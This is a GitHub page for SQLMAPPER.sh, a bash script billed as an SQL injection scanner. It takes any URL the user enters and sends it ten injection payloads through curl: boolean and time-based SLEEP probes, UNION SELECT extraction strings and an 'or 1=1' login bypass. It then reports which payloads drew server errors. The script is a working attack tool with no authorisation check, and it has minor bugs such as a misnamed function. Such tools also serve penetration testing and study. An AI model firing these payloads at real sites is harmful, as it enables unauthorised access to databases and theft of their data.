-
Notifications
You must be signed in to change notification settings - Fork 0
/
SQLMAPPER.sh
127 lines (104 loc) · 10.6 KB
/
SQLMAPPER.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#!/bin/bash
rint_color() {
color=$1
text=$2
echo -e "${color}${text}\e[0m"
}
# Function to display ASCII art for tool name
display_ascii_art() {
cat << "EOF"
⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⢀⡴⠉⠀⠀⠀⣠⠞⠁⣠⠖⠋⠁⠀⠀⣠⠞⠁⠀⠀⢸⣷⣶⣦⠀⠀⣄⠙⢦⠀⠀⠙⢆⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⣠⠖⠋⠀⢀⠖⣠⠊⢀⡴⠋⠁⠀⠀⢀⣤⡾⠁⠀⣠⠆⠀⣸⣟⡉⠘⣧⡀⠈⢧⠈⢧⠀⠀⠈⢣⡀⠈⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣩⠴⡾⠃⠀⠀⣴⠃⠀⠀⢠⠞⠀⠀⠀⠀⡠⢞⡟⠀⢀⡾⠁⡆⠀⣿⡏⠙⢦⢾⣷⡀⠈⣆⠈⢇⠰⡀⠀⠱⡀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡜⠁⠀⠀⡼⠁⠀⠀⣰⠏⠀⠀⠀⢀⡼⢁⡜⠀⢠⡟⠀⢀⠇⢀⣿⠁⠀⠀⢻⣿⣷⡄⠘⡄⠘⡆⠹⡀⠀⢹⡀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡞⠀⣠⠂⣼⠁⠀⠀⢠⠇⠀⠀⠀⠀⡞⠀⡜⠁⣴⡟⠀⠀⣼⠀⣼⡏⠀⠀⠀⠀⢻⣿⡿⠀⢱⡀⠸⡄⢳⠀⠀⢧⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠁⢠⠃⢰⠃⠀⠀⢠⠏⠀⠀⠀⠀⡾⠀⢰⠃⢀⡟⠀⠀⢀⡏⢰⣿⠁⠀⠀⠀⠀⠀⢻⣽⡆⠈⣇⠀⢳⠘⡇⠀⠸⡄⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢰⠃⠀⡜⠀⡜⠀⠀⢠⡏⠀⠀⣸⠁⣸⠀⠀⡟⢀⡼⠀⠀⠀⣸⠀⣼⠏⠀⠀⠀⠀⠀⠀⠀⢳⣷⠀⢹⠀⠘⡄⢱⠀⠀⠹⡀⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⡏⠀⢰⡇⠀⡇⠀⢠⣿⠁⠀⢰⠇⢠⠇⠀⢠⠇⣸⠃⠀⠀⢠⡇⣰⡟⠀⠀⣀⣀⠀⠀⠀⠀⠈⣿⡆⢸⡆⠀⣧⢸⡄⠀⠀⣧⡀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⢸⠁⠀⢸⠀⠀⡇⠀⣾⡟⠀⠀⡏⠀⡞⠀⠀⢸⢀⡇⠀⠀⠀⡾⢠⣿⢃⡴⠋⠀⠘⢦⠀⠀⠀⠀⠸⣷⢸⢇⠀⢹⠘⣷⠀⠀⣿⠹⡀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⣿⠀⠀⡇⠀⠀⡇⢠⣻⠃⠀⢰⠃⢸⠁⠀⠀⢸⣿⠀⠀⠀⣰⠁⣬⠏⢸⠀⢚⣉⣡⠟⠀⠀⠀⢀⡤⣿⢠⢻⠀⢸⠀⣿⠀⠀⡏⠀⡇⢸⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⣯⠀⠀⡇⠀⠀⡇⢺⡏⠀⠀⢸⠀⡸⠀⠀⠀⣼⣿⠀⠀⢰⠏⣾⡟⠀⠘⢦⡈⠉⠁⢀⣠⣴⠞⠉⠀⢹⣼⠘⠇⢸⣴⣿⡄⠀⡇⢀⡇⢨⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⢸⡀⠀⢧⠀⢠⢷⣾⢰⠀⢀⡇⠀⡇⠀⠀⡄⢻⡇⠀⢠⠏⢠⡾⠁⠀⠀⣀⣽⣿⢿⡿⠟⠓⠒⠦⣄⢸⡿⡇⠀⣸⡿⠂⡇⠀⡇⢸⠁⣸⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢣⡀⢸⡄⣾⣟⡇⣿⠀⢸⡇⢸⡇⠀⢰⠀⢸⠃⢠⡟⢰⣿⡁⠀⠀⠾⠿⠿⠟⠋⣀⣠⣤⣤⣀⠈⣿⠻⡇⡀⡟⠛⢰⡄⢸⡇⣾⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠈⢣⢸⣿⠛⣿⠁⣿⠀⢀⡇⠸⡇⠀⣼⠀⠸⣆⣾⡇⣼⡟⣷⠀⠀⠀⠀⠀⠐⠿⠿⠛⠉⠙⠛⢿⣇⣠⣧⢸⣿⠁⠀⣷⡈⣷⣇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣾⡏⠀⠾⡀⢹⡀⠘⡇⢻⡇⠀⣿⡄⠀⣿⣿⣗⣿⢀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣧⡟⣿⠀⠀⡟⢷⣿⣏⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡿⢳⠀⠀⢷⢸⡇⠀⠃⢸⡇⣠⣿⡇⢰⣿⣿⣿⡇⠨⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⡇⣿⣆⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠚⠀⠸⡆⠀⠀⠈⣿⠀⠀⣼⣷⣿⣿⢇⣾⣿⢿⡿⣆⣸⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁⣿⣷⣿⡿⢳⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣷⡞⣇⠀⢹⣇⣴⡿⢻⣿⣿⣾⠟⠁⠘⠇⠈⠻⢶⡠⠒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣻⣿⣇⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠏⠀⣿⣠⣿⣿⢿⡇⠀⠙⠋⠁⠀⠀⠀⠀⠀⠀⠂⠙⠶⠜⠊⠛⠩⠋⣉⣠⡤⠀⠀⠀⠀⣼⡿⣯⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠿⠋⠘⣿⣆⠀⠀⠀⠐⠒⢢⣤⣤⠤⠴⠒⠒⠒⠒⠒⠒⠒⠚⠉⠉⠁⠀⠀⠀⢀⣼⠏⢰⣿⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⠿⣿⣦⡀⢀⡴⣚⡵⠚⠁⠀⣀⣀⠀⢀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⢠⣾⢿⣆⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⡟⣩⠞⠉⠀⠀⠀⠀⠈⠉⢛⣟⠛⠉⠁⠀⠀⠀⠀⠀⢀⣴⢿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⠟⠉⠳⣄⡀⠀⠀⠀⣠⣀⣼⣿⠀⣠⡄⠀⠀⠀⢀⣴⡟⠁⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣠⣤⣼⡇⠀⠀⠈⠻⣦⣶⣤⣿⣷⣿⣿⣶⣿⣷⣴⣿⣴⠟⠋⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣾⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠙⠛⠿⠿⠿⠿⠿⠿⠛⠛⠛⠁⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⡏⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿⣿⣿⢾⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡿⠁⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⠃⠈⠻⣧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢞⡆⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡋
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣟⠁⠀⠀⠀⠈⠻⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⠁⣾⠁⠀⢀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇
⠀⠀⠀⠀⠀⠀⠀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⠀⠀⠀⠈⠳⢦⣀⠀⠀⠀⠀⠀⠀⣠⠞⠁⠀⢰⢇⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⣀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠉⠳⠦⣤⡤⠶⠟⠁⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣤⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
███████ ██████ ██ ███ ███ █████ ██████ ██████ ███████ ██████
██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ████ ██ ███████ ██████ ██████ █████ ██████
██ ██ ▄▄ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██████ ███████ ██ ██ ██ ██ ██ ██ ███████ ██ ██
▀▀
+-------------------------------------------------------+
| |
| SQLMAPPER - SQL injection vul scanner |
| Author: Ajansha Shankar |
| LinkedIn: Ajansha Shankar |
| GitHub: https://github.com/ajansha |
+-------------------------------------------------------+
EOF
}
check_sql_injection_vulnerability() {
url=$1
possible_payloads=()
# List of payloads to test
payloads=(
"(SELECT (CASE WHEN (8457=8457) THEN 1 ELSE (SELECT 7822 UNION SELECT 4157) END))"
"1 AND (SELECT 3348 FROM (SELECT(SLEEP(5)))mjOo)"
"1 UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a6b71,0x4c51477945484478756a6c416556665447736e647968426673756943586e4e417441596175674c76,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL-- -"
"1&id=8%20AND%20(SELECT%203348%20FROM%20(SELECT(SLEEP(5)))mjOo)"
" cat=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a6b71,0x4c51477945484478756a6c416556665447736e647968426673756943586e4e417441596175674c76,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL-- -&sub_cat=2"
"%20cat%3D1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716a6a6b71%2C0x4c51477945484478756a6c416556665447736e647968426673756943586e4e417441596175674c76%2C0x7171766a71%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-%26sub_cat%3D2"
"%20id%3D13%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716a787671%2C0x42764941656f504a6b52646c6e4445677a4e4d4c546a726e45624b6b6a49766f48426e5348726768%2C0x71786a7171%29--%20-"
"id=8%20AND%20(SELECT%20(CASE%20WHEN%20(8457=8457)%20THEN%201%20ELSE%20(SELECT%207822%20UNION%20SELECT%204157)%20END))"
"1234%20%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20%27admin%27%2C%20%2781dc9bdb52d04dc20036dbd8313ed055"
"admin%22%20or%201%3D1%2F%2A"
)
for payload in "${payloads[@]}"; do
test_url=$(echo "$url" | sed -e "s/cat=[0-9]*/cat=${payload}/" -e "s/id=[0-9]*/id=${payload}/")
echo "Testing payload: $test_url"
response_code=$(curl -s -o /dev/null -w "%{http_code}" "$test_url")
response_body=$(curl -s "$test_url")
echo "Response code: $response_code"
if [[ "$response_code" == "500" || "$response_body" =~ [Ee][Rr][Rr][Oo][Rr] ]]; then
vulnerable_payloads+=("$payload")
elif [[ "$response_code" == "200" ]]; then
possible_payloads+=("$payload")
fi
done
if [ ${#vulnerable_payloads[@]} -gt 0 ]; then
echo "The following payloads are vulnerable to SQL injection:"
for payload in "${vulnerable_payloads[@]}"; do
echo "$payload"
done
else
echo "Try possible payloads."
fi
if [ ${#possible_payloads[@]} -gt 0 ]; then
echo "________________The following payloads might be vulnerable to SQL injection:____________________"
for payload in "${possible_payloads[@]}"; do
echo "$payload"
done
fi
}
display_ascii_art
read -p "Enter the URL to test: " url
check_sql_injection_vulnerability "$url"